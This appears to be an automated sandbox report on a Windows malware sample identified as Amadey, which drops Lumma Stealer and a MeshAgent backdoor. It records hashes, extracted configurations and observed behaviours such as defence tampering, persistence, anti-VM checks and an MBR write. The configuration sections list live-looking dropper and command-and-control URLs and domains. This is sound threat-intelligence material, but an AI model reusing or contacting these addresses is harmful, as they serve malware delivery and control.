amadey | bbd0e0c8992b91a114ccb9ecba91d146ae17a35a5b85a1c107fd273d18b4e089

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
04/04/2025, 18:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

938KB
MD5

cbf68f77f4cd12e46a80430a739ce71f
SHA1

de3df5da3f6cbf132a17cd4b160dfe484c5725b5
SHA256

bbd0e0c8992b91a114ccb9ecba91d146ae17a35a5b85a1c107fd273d18b4e089
SHA512

7a6fe5f78c7c068d196912edd2bd7e4bf5fc679ffdb198fe0ef9677b297bef9b7fa5416f1d930bc4f26bb23d20aab5dee653d386a55a5978a6be1506b406fb28
SSDEEP

24576:6qDEvCTbMWu7rQYlBQcBiT6rprG8a0yu:6TvC/MTQYxsWR7a0y

Score

10^/10

amadey lumma meshagent 092155 test123 backdoor bootkit defense_evasion discovery execution exploit persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

meshagent

Version

Botnet

test123

http://aaso12.duckdns.org:443/agent.ashx

Attributes

mesh_id
0x0CF4A8B0663DD2F1D3A44CE8D231621166DBDB1E723B374C911544DE2F45A87C6C52F7206CED32F5B6A52A5551B75A3C
server_id
22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8
wss
wss://aaso12.duckdns.org:443/agent.ashx

Extracted

Family

lumma

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects MeshAgent payload 3 IoCs

resource	yara_rule
behavioral1/memory/2740-105-0x00007FF6B3050000-0x00007FF6B33C5000-memory.dmp	family_meshagent
behavioral1/files/0x0007000000024282-107.dat	family_meshagent
behavioral1/memory/2740-111-0x00007FF6B3050000-0x00007FF6B33C5000-memory.dmp	family_meshagent

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
MeshAgent
MeshAgent is an open source remote access trojan written in C++.
rat trojan backdoor meshagent
Meshagent family
meshagent

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e08fa14c46.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a2b268f8c5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
15	3976	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4708	powershell.exe
4776	powershell.exe
3064	powershell.exe
956	powershell.exe
3836	powershell.exe
2300	powershell.exe
10892	powershell.exe
11852	powershell.exe
3976	powershell.exe
5556	powershell.exe
336	powershell.exe
5128	powershell.exe
5152	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 9 IoCs

flow	pid	Process
31	4804	rapes.exe
31	4804	rapes.exe
31	4804	rapes.exe
31	4804	rapes.exe
298	4804	rapes.exe
298	4804	rapes.exe
373	2276	svchost.exe
576	4804	rapes.exe
15	3976	powershell.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
5224	takeown.exe
712	icacls.exe

Sets service image path in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	s.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	s.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e08fa14c46.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e08fa14c46.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a2b268f8c5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a2b268f8c5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	262.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	262.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe

Deletes itself 1 IoCs

pid	Process
4692	w32tm.exe

Executes dropped EXE 23 IoCs

pid	Process
5060	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE
4804	rapes.exe
2676	apple.exe
2480	262.exe
4008	262.exe
2176	MeshAgent.exe
4608	rapes.exe
2244	RLPhvHg.exe
5172	7q8Wm5h.exe
5400	e08fa14c46.exe
5620	7IIl2eE.exe
5256	Passwords.com
4088	a2b268f8c5.exe
4200	UZPt0hR.exe
4532	FrameworkName.exe
4728	MeshAgent.exe
5400	TbV75ZR.exe
1680	tzutil.exe
4692	w32tm.exe
9060	RLPhvHg.exe
11648	rapes.exe
9148	9sWdA2p.exe
4232	qhjMWht.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	e08fa14c46.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	a2b268f8c5.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5224	takeown.exe
712	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	a2b268f8c5.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\exe\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\exe\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\win32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\Kernel.Appcore.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\dll\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\DLL\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ws2_32.pdb	MeshAgent.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1244	tasklist.exe
752	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
5060	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE
4804	rapes.exe
4608	rapes.exe
5400	e08fa14c46.exe
4088	a2b268f8c5.exe
11648	rapes.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 5400 set thread context of 1152	5400	TbV75ZR.exe	243
PID 4532 set thread context of 10592	4532	FrameworkName.exe	263

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.exe	s.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.exe	s.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5008	sc.exe
4332	sc.exe
4660	sc.exe
2252	sc.exe
1016	sc.exe
5676	sc.exe
2012	sc.exe
676	sc.exe
5072	sc.exe
5088	sc.exe
3416	sc.exe
5732	sc.exe
4572	sc.exe
3952	sc.exe
2440	sc.exe
4840	sc.exe
3740	sc.exe
3424	sc.exe
2328	sc.exe
4788	sc.exe
2668	sc.exe
6000	sc.exe
3564	sc.exe
5756	sc.exe
3732	sc.exe
3600	sc.exe
5980	sc.exe
2904	sc.exe
4696	sc.exe
2464	sc.exe
220	sc.exe
3220	sc.exe
4232	sc.exe
4876	sc.exe
1768	sc.exe
1096	sc.exe
1600	sc.exe
2524	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	262.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempMUTMGHCGLSPKRDFEGTG1HZVQXET1VQWT.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a2b268f8c5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	262.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qhjMWht.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e08fa14c46.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
4648	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
